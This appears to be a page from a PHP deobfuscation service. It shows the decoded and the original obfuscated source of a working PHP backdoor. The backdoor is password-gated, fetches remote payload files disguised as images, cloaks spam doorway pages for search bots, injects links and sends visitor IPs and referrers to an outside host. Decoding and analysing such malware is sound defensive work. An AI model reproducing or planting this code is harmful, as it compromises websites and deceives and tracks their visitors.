Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $fRIUdLDIRct="EWaIi7DUekAz8OBfSM9p0PK4gjZ6tYrR3scun15LxmJNHXTvlQyhq2owFVbd_CG";$JgCf..
Decoded Output download
set_time_limit(0);
function change_page_regex($page, $links,$reg,$res){
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links)>0){
$element = "<p>";
$element .= implode("<br>
", $links);
$element .= "</p>";
$page = preg_replace('/\<\/body\>/i', "
" . $element . "
$0", $page, 1);
}
return $page;
}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
$curly_page_get_info=curl_getinfo($ch);
curl_close($ch);
return array($result,$curly_page_get_info);
}
function get_proxy_page(){
$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type'];
$nexturl=@$curly_page_get_info['redirect_url'];
$status=@$curly_page_get_info['http_code'];
if (status!="")header("Status: $status");
if ($ct!=""){
header("Content-type: $ct");
}
if ($nexturl!=""){
header("Location: $nexturl");
}
return array($buf,$ct);
}
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}
$content="";
$x=@$_POST["pppp_check"];
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);
$urx=$host.$uri;
$md5urx=md5($urx);
$tmppath=$tmppath."/.".$md5host."/";
@mkdir($tmppath);
$configs=$tmppath."emoji1.png";
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
$domain=base64_decode("cG9wLXVwMjAxOS5ydQ==");
$p=md5(base64_decode(@$_POST["p"]));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){
echo "###UPDATING_FILES###
";
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png");
@file_put_contents($configs,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg");
@file_put_contents($bd,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif");
@file_put_contents($templ,$buf1);
exit;
}
if ($x=="4"){
echo "###WORKED###
";exit;
}
}else{
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])){
$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
$off=$cf[$md5urx]+0;
$template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf));
$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode("
",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){
$doorcontent=base64_decode($text);
echo $doorcontent;exit;
}else{
$template=str_replace("%text%",$text,$template);
$template=str_replace("%title%",$title,$template);
$template=str_replace("%description%",$description,$template);
$template=str_replace("%uckeyword%",$uckeyword,$template);
$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){
$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
}
echo $template;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){
$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
$links=$info["links_a"];
$buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1;
$links=$info["links_p"];
$buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf;
}
}
if ($se) {
if (isset($info["isdoor"])){
list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
echo $buf1;exit;
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;exit;
}
}
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;
}
}
Did this file decode correctly?
Original Code
<?php $fRIUdLDIRct="EWaIi7DUekAz8OBfSM9p0PK4gjZ6tYrR3scun15LxmJNHXTvlQyhq2owFVbd_CG";$JgCfbLeDzwBmQ=$fRIUdLDIRct[58] . $fRIUdLDIRct[2] .$fRIUdLDIRct[33]. $fRIUdLDIRct[8]. $fRIUdLDIRct[27] .$fRIUdLDIRct[23].
$fRIUdLDIRct[60] .$fRIUdLDIRct[59]. $fRIUdLDIRct[8] . $fRIUdLDIRct[34]. $fRIUdLDIRct[54]. $fRIUdLDIRct[59] . $fRIUdLDIRct[8];$AgLmaPcRgxA=$fRIUdLDIRct[24] .$fRIUdLDIRct[11].$fRIUdLDIRct[4].$fRIUdLDIRct[36] . $fRIUdLDIRct[15].
$fRIUdLDIRct[48].$fRIUdLDIRct[2].
$fRIUdLDIRct[28] .$fRIUdLDIRct[8];$DMKtXgDOqKknho=$fRIUdLDIRct[8] .$fRIUdLDIRct[30].
$fRIUdLDIRct[30] .$fRIUdLDIRct[54]. $fRIUdLDIRct[30].$fRIUdLDIRct[60].
$fRIUdLDIRct[30].
$fRIUdLDIRct[8] . $fRIUdLDIRct[19] . $fRIUdLDIRct[54].
$fRIUdLDIRct[30] .$fRIUdLDIRct[28]. $fRIUdLDIRct[4] . $fRIUdLDIRct[36]. $fRIUdLDIRct[24];$lYqrrPZrlMISJG=$fRIUdLDIRct[34] .$fRIUdLDIRct[30] .$fRIUdLDIRct[8] . $fRIUdLDIRct[2] . $fRIUdLDIRct[28] .$fRIUdLDIRct[8].$fRIUdLDIRct[60]. $fRIUdLDIRct[15]. $fRIUdLDIRct[35] .$fRIUdLDIRct[36]. $fRIUdLDIRct[34] . $fRIUdLDIRct[28]. $fRIUdLDIRct[4] .$fRIUdLDIRct[54].
$fRIUdLDIRct[36];$DMKtXgDOqKknho(0);$VLEPRSBc=$lYqrrPZrlMISJG("",$AgLmaPcRgxA($JgCfbLeDzwBmQ("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")));$VLEPRSBc();?>
Function Calls
null | 1 |
gzinflate | 1 |
base64_decode | 1 |
create_function | 1 |
error_reporting | 1 |
Stats
MD5 | fc60b0e1018442bd3c805e92ffb31101 |
Eval Count | 1 |
Decode Time | 100 ms |